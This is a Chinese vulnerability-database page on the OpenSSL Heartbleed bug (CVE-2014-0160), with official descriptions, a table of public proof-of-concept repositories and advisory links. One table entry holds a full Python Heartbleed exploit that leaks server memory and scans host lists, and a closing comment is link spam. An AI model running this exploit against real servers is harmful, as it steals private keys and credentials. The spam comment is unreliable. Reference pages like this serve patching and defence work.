CVE-2014-0160: OpenSSL 缓冲区错误漏洞

获取后续新漏洞提醒登录后订阅

一、漏洞 CVE-2014-0160 基础信息

漏洞信息

对漏洞内容有疑问？看看神龙的深度分析是否有帮助！

查看神龙十问 ↗

尽管我们使用了先进的大模型技术，但其输出仍可能包含不准确或过时的信息。神龙努力确保数据的准确性，但请您根据实际情况进行核实和判断。

Vulnerability Title

N/A

来源: 美国国家漏洞数据库 NVD

Vulnerability Description

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

来源: 美国国家漏洞数据库 NVD

CVSS Information

N/A

来源: 美国国家漏洞数据库 NVD

Vulnerability Type

N/A

来源: 美国国家漏洞数据库 NVD

Vulnerability Title

OpenSSL 缓冲区错误漏洞

来源: 中国国家信息安全漏洞库 CNNVD

Vulnerability Description

OpenSSL是OpenSSL团队开发的一个开源的能够实现安全套接层（SSL v2/v3）和安全传输层（TLS v1）协议的通用加密库，它支持多种加密算法，包括对称密码、哈希算法、安全散列算法等。 OpenSSL的TLS和DTLS实现过程中的d1_both.c和t1_lib.c文件中存在安全漏洞，该漏洞源于当处理Heartbeat Extension数据包时，缺少边界检查。远程攻击者可借助特制的数据包利用该漏洞读取服务器内存中的敏感信息(如用户名、密码、Cookie、私钥等)。以下版本的OpenSSL受到

来源: 中国国家信息安全漏洞库 CNNVD

CVSS Information

N/A

来源: 中国国家信息安全漏洞库 CNNVD

Vulnerability Type

N/A

来源: 中国国家信息安全漏洞库 CNNVD

受影响产品

厂商	产品	影响版本	CPE	订阅
-	n/a	n/a	-

二、漏洞 CVE-2014-0160 的公开POC

#	POC 描述	源链接	神龙链接
1	A checker (site and tool) for CVE-2014-0160	https://github.com/FiloSottile/Heartbleed	POC详情
2	OpenSSL CVE-2014-0160 Heartbleed vulnerability test	https://github.com/titanous/heartbleeder	POC详情
3	bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).	https://github.com/DominikTo/bleed	POC详情
4	Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).	https://github.com/cyphar/heartthreader	POC详情
5	Patch openssl #heartbleed with ansible	https://github.com/jdauphant/patch-openssl-CVE-2014-0160	POC详情
6	Multi-threaded tool for scanning many hosts for CVE-2014-0160.	https://github.com/musalbas/heartbleed-masstest	POC详情
7	None	https://github.com/obayesshelton/CVE-2014-0160-Scanner	POC详情
8	Heartbleed (CVE-2014-0160) client exploit	https://github.com/Lekensteyn/pacemaker	POC详情
9	OpenSSL TLS heartbeat read overrun (CVE-2014-0160)	https://github.com/isgroup/openmagic	POC详情
10	openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor	https://github.com/fb1h2s/CVE-2014-0160	POC详情
11	Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160	https://github.com/takeshixx/ssl-heartbleed.nse	POC详情
12	Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160	https://github.com/roganartu/heartbleedchecker-chrome	POC详情
13	Checks for vulnerabilities: CVE-2014-0160	https://github.com/zouguangxian/heartbleed	POC详情
14	Test for SSL heartbeat vulnerability (CVE-2014-0160)	https://github.com/sensepost/heartbleed-poc	POC详情
15	A firefox extension and checker for CVE-2014-0160	https://github.com/proactiveRISK/heartbleed-extention	POC详情
16	Test CIDR blocks for CVE-2014-0160/Heartbleed	https://github.com/amerine/coronary	POC详情
17	Heartbleed variants	https://github.com/0x90/CVE-2014-0160	POC详情
18	None	https://github.com/ice-security88/CVE-2014-0160	POC详情
19	This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.	https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker	POC详情
20	CVE-2014-0160 mass test against subdomains	https://github.com/siddolo/knockbleed	POC详情
21	OpenSSL Heartbleed (CVE-2014-0160) Fix script	https://github.com/sammyfung/openssl-heartbleed-fix	POC详情
22	CVE-2014-0160 scanner	https://github.com/a0726h77/heartbleed-test	POC详情
23	POC for CVE-2014-0160 (Heartbleed) for DTLS	https://github.com/hreese/heartbleed-dtls	POC详情
24	Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160	https://github.com/wwwiretap/bleeding_onions	POC详情
25	Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)	https://github.com/idkqh7/heatbleeding	POC详情
26	Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160.	https://github.com/GeeksXtreme/ssl-heartbleed.nse	POC详情
27	A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability	https://github.com/xlucas/heartbleed	POC详情
28	A checker (site and tool) for CVE-2014-0160:	https://github.com/indiw0rm/-Heartbleed-	POC详情
29	OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.	https://github.com/einaros/heartbleed-tools	POC详情
30	A checker (site and tool) for CVE-2014-0160	https://github.com/mozilla-services/Heartbleed	POC详情
31	openssl Heartbleed bug(CVE-2014-0160) check for Node.js	https://github.com/yryz/heartbleed.js	POC详情
32	Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)	https://github.com/DisK0nn3cT/MaltegoHeartbleed	POC详情
33	CVE-2014-0160 (Heartbeat Buffer over-read bug)	https://github.com/OffensivePython/HeartLeak	POC详情
34	Heartbleed (CVE-2014-0160) SSLv3 Scanner	https://github.com/vortextube/ssl_scanner	POC详情
35	:broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:	https://github.com/mpgn/heartbleed-PoC	POC详情
36	#!/usr/bin/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) #print ' %04x: %-48s %s' % (b, hxdat, pdat) pdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print "Error receiving data: ", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp/pop3/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send("EHLO someone.org\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if pop3/imap supports starttls/stls elif port in {110, 143}: print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send("CAPA\n") if port == 143: s.send("CAPABILITY\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if ftp supports auth tls/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send("FEAT\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "AUTH TLS" in check: opts.starttls = True atls = True print "AUTH TLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send("STLS\n") elif atls: print 'Sending AUTH TLS Command...' s.send("AUTH TLS\n") else: print 'Sending STARTTLS Command...' s.send("STARTTLS\n") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print "Error connecting to host: ", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, "r") for line in fileIN: targetinfo = line.strip().split(":") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()	https://github.com/xanas/heartbleed.py	POC详情
37	A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..	https://github.com/iSCInc/heartbleed	POC详情
38	None	https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang	POC详情
39	Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed	https://github.com/hmlio/vaas-cve-2014-0160	POC详情
40	Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)	https://github.com/hybridus/heartbleedscanner	POC详情
41	Dockerfile for testing CVE-2014-0160 Heartbleed exploitation.	https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx	POC详情
42	Heartbleed	https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin	POC详情
43	来自：https://www.freebuf.com/articles/web/31700.html	https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC	POC详情
44	CVE-2014-0160	https://github.com/Saymeis/HeartBleed	POC详情
45	cve-2014-0160	https://github.com/cved-sources/cve-2014-0160	POC详情
46	Demonstration of the Heartbleed Bug CVE-2014-0160	https://github.com/cheese-hub/heartbleed	POC详情
47	None	https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS	POC详情
48	Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔	https://github.com/cldme/heartbleed-bug	POC详情
49	Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.	https://github.com/ThanHuuTuan/Heartexploit	POC详情
50	Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL/TLS versions)	https://github.com/rouze-d/heartbleed	POC详情
51	None	https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed	POC详情
52	CVE-2014-0160 OpenSSL Heartbleed Proof of Concept	https://github.com/GuillermoEscobero/heartbleed	POC详情
53	A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device	https://github.com/clino-mania/A2SV--SSL-VUL-Scan	POC详情
54	OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.	https://github.com/ingochris/heartpatch.us	POC详情
55	A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸	https://github.com/BelminD/heartbleed	POC详情
56	The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL/TLS to keep the connection alive.	https://github.com/pierceoneill/bleeding-heart	POC详情
57	None	https://github.com/crypticdante/CVE-2014-0160_Heartbleed	POC详情
58	fuzzing with libFuzzer，inlude openssl heartbleed (CVE-2014-0160)	https://github.com/GardeniaWhite/fuzzing	POC详情
59	Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock:	https://github.com/undacmic/heartbleed-proof-of-concept	POC详情
60	Check for CVE-2014-0160	https://github.com/cbk914/heartbleed-checker	POC详情
61	None	https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin	POC详情
62	None	https://github.com/timsonner/cve-2014-0160-heartbleed	POC详情
63	None	https://github.com/H3xL00m/CVE-2014-0160_Heartbleed	POC详情
64	None	https://github.com/n3ov4n1sh/CVE-2014-0160_Heartbleed	POC详情
65	None	https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed	POC详情
66	OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner.	https://github.com/pblittle/aws-suture	POC详情
67	None	https://github.com/Sp3c73rSh4d0w/CVE-2014-0160_Heartbleed	POC详情
68	None	https://github.com/0xwh1pl4sh/CVE-2014-0160_Heartbleed	POC详情
69	None	https://github.com/N3rdyN3xus/CVE-2014-0160_Heartbleed	POC详情
70	None	https://github.com/Yash-Thakkar77/CVE-2014-0160-HeartBleed	POC详情
71	None	https://github.com/NyxByt3/CVE-2014-0160_Heartbleed	POC详情
72	A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸	https://github.com/belmind/heartbleed	POC详情
73	None	https://github.com/h3xcr4ck3r/CVE-2014-0160_Heartbleed	POC详情
74	None	https://github.com/n3rdh4x0r/CVE-2014-0160_Heartbleed	POC详情
75	None	https://github.com/yashfren/CVE-2014-0160-HeartBleed	POC详情
76	The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.	https://github.com/projectdiscovery/nuclei-templates/blob/main/code/cves/2014/CVE-2014-0160.yaml	POC详情
77	None	https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E6%BB%B4%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md	POC详情
78	None	https://github.com/Threekiii/Awesome-POC/blob/master/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E/OpenSSL%20%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E%20CVE-2014-0160.md	POC详情
79		https://github.com/vulhub/vulhub/blob/master/openssl/CVE-2014-0160/README.md	POC详情
80	None	https://github.com/h3x0v3rl0rd/CVE-2014-0160_Heartbleed	POC详情
81	This is the Heratbleed bug (CVE-2014-0160) documentation I did for Advenced Cyber Attacks course.	https://github.com/Shayhha/HeartbleedAttack	POC详情
82	The objective of this project was to assess a remote host for the Heartbleed vulnerability (CVE-2014-0160), verify its presence, and exploit it to extract potentially sensitive information from server memory over the TLS protocol.	https://github.com/ArtemCyberLab/Project-Field-Analysis-and-Memory-Leak-Demonstration	POC详情
83	Proof of concept for CVE-2014-0160 (OpenSSL 1.0.1 - Heartbleed)	https://github.com/0x00-V/heartbleed-poc	POC详情
84	Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔	https://github.com/tomdevman/heartbleed-bug	POC详情
85	Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160	https://github.com/0xinf0/bleeding_onions	POC详情
86	This Python PoC script detects the Heartbleed vulnerability (CVE-2014-0160) by performing a TLS handshake with heartbeat extension and sending a crafted heartbeat request. It parses responses to identify leaked memory, helping assess server susceptibility to this critical OpenSSL flaw.	https://github.com/indrajeetmp11/Heartbleed-PoC-Exploit-Script	POC详情
87	Heartbleed (CVE-2014-0160) was devastating because it leaked adjacent memory. CTT-Heartbleed goes further—it uses 33-layer temporal resonance to map, reconstruct, and extract specific memory regions across time, not just adjacent buffers.	https://github.com/SimoesCTT/CTT-HEARTBLEED-Temporal-Resonance-Memory-Leak-Exploit-Heartbleed-CVE-2014-0160	POC详情
88	None	https://github.com/22imer/CVE-2014-0160	POC详情

AI 生成 POC高级

未找到公开 POC。

登录以生成 AI POC

三、漏洞 CVE-2014-0160 的情报信息

Please 登录 to view more intelligence information

http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/
http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf
http://www-01.ibm.com/support/docview.wss?uid=isg400001841
http://www.blackberry.com/btsc/KB35882
http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/
http://advisories.mageia.org/MGASA-2014-0165.html
http://www.kerio.com/support/kerio-control/release-history
http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/
https://www.cert.fi/en/reports/2014/vulnerability788210.html
https://cert-portal.siemens.com/productcert/pdf/ssa-635659.pdf
http://cogentdatahub.com/ReleaseNotes.html
http://support.citrix.com/article/CTX140605
https://blog.torproject.org/blog/openssl-bug-cve-2014-0160
https://code.google.com/p/mod-spdy/issues/detail?id=85
http://www.openssl.org/news/secadv_20140407.txt
http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1
http://www.splunk.com/view/SP-CAAAMB3
http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf
http://heartbleed.com/
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00
https://gist.github.com/chapmajs/10473815
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
https://bugzilla.redhat.com/show_bug.cgi?id=1084875
https://sku11army.blogspot.com/2020/01/heartbleed-hearts-continue-to-bleed.html
https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217
https://filezilla-project.org/versions.php?type=server
https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008
http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/
http://www-01.ibm.com/support/docview.wss?uid=swg21670161
http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/
http://www.vmware.com/security/advisories/VMSA-2014-0012.html
http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html
http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html
http://www.exploit-db.com/exploits/32745exploit
http://secunia.com/advisories/59243third-party-advisory
http://secunia.com/advisories/57966third-party-advisory
http://secunia.com/advisories/59139third-party-advisory
http://secunia.com/advisories/59347third-party-advisory
http://secunia.com/advisories/57347third-party-advisory
http://secunia.com/advisories/57483third-party-advisory
http://secunia.com/advisories/57836third-party-advisory
http://www.securityfocus.com/bid/66690vdb-entry
http://secunia.com/advisories/57721third-party-advisory
http://secunia.com/advisories/57968third-party-advisory
http://www.exploit-db.com/exploits/32764exploit
http://www.securitytracker.com/id/1030078vdb-entry
http://www.securitytracker.com/id/1030082vdb-entry
http://www.securitytracker.com/id/1030081vdb-entry
http://www.securitytracker.com/id/1030080vdb-entry
http://www.securitytracker.com/id/1030026vdb-entry
http://www.securitytracker.com/id/1030074vdb-entry
http://www.securitytracker.com/id/1030079vdb-entry
http://www.securitytracker.com/id/1030077vdb-entry
http://www.debian.org/security/2014/dsa-2896vendor-advisory
http://www.us-cert.gov/ncas/alerts/TA14-098Athird-party-advisory
http://www.kb.cert.org/vuls/id/720951third-party-advisory
http://www.ubuntu.com/usn/USN-2165-1vendor-advisory
http://marc.info/?l=bugtraq&m=142660345230545&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139824993005633&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139843768401936&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140015787404650&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139808058921905&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139757726426985&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139757819327350&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139869720529462&w=2vendor-advisory
https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCavendor-advisory
http://marc.info/?l=bugtraq&m=139836085512508&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139757919027752&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139774703817488&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905295427946&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139833395230364&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139842151128341&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905868529690&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139817685517037&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905351928096&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140724451518351&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905653828999&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139758572430452&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139869891830365&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140075368411126&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905243827825&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139722163017074&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139889113431619&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139765756720506&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139835844111589&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139774054614965&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905202427693&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139905458328378&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=141287864628122&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139817782017443&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139889295732144&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139817727317190&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139824923705461&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=139835815211508&w=2vendor-advisory
http://marc.info/?l=bugtraq&m=140752315422991&w=2vendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0396.htmlvendor-advisory
http://www.mandriva.com/security/advisories?name=MDVSA-2015:062vendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0378.htmlvendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0376.htmlvendor-advisory
http://rhn.redhat.com/errata/RHSA-2014-0377.htmlvendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.htmlvendor-advisory
http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.htmlvendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.htmlvendor-advisory
http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.htmlvendor-advisory
http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.htmlvendor-advisory
http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.htmlvendor-advisory
http://seclists.org/fulldisclosure/2014/Apr/90mailing-list
http://seclists.org/fulldisclosure/2014/Apr/109mailing-list
http://seclists.org/fulldisclosure/2014/Apr/190mailing-list
http://seclists.org/fulldisclosure/2014/Apr/91mailing-list
http://seclists.org/fulldisclosure/2014/Apr/173mailing-list
https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220%40%3Cdev.tomcat.apache.org%3Emailing-list
https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d%40%3Cdev.tomcat.apache.org%3Emailing-list
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleedvendor-advisory
https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.htmlmailing-list
http://seclists.org/fulldisclosure/2014/Dec/23mailing-list
http://www.securityfocus.com/archive/1/534161/100/0/threadedmailing-list
https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2%40%3Cdev.tomcat.apache.org%3Emailing-list
https://nvd.nist.gov/vuln/detail/CVE-2014-0160

IV. Related Vulnerabilities

Same product: n/a

Same vendor: n/a

V. Comments for CVE-2014-0160

匿名用户

2026-04-25 13:12:22

Hello pals! I came across a 169 valuable website that I think you should visit. This platform is packed with a lot of useful information that you might find valuable. It has everything you could possibly need, so be sure to give it a visit! <a href=https://practicesource.com/the-most-profitable-lines-of-business/>https://practicesource.com/the-most-profitable-lines-of-business/</a> And do not neglect, guys, that you always may in the publication discover solutions to address the most the very confusing questions. We tried to explain all of the data using the most most understandable method.

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

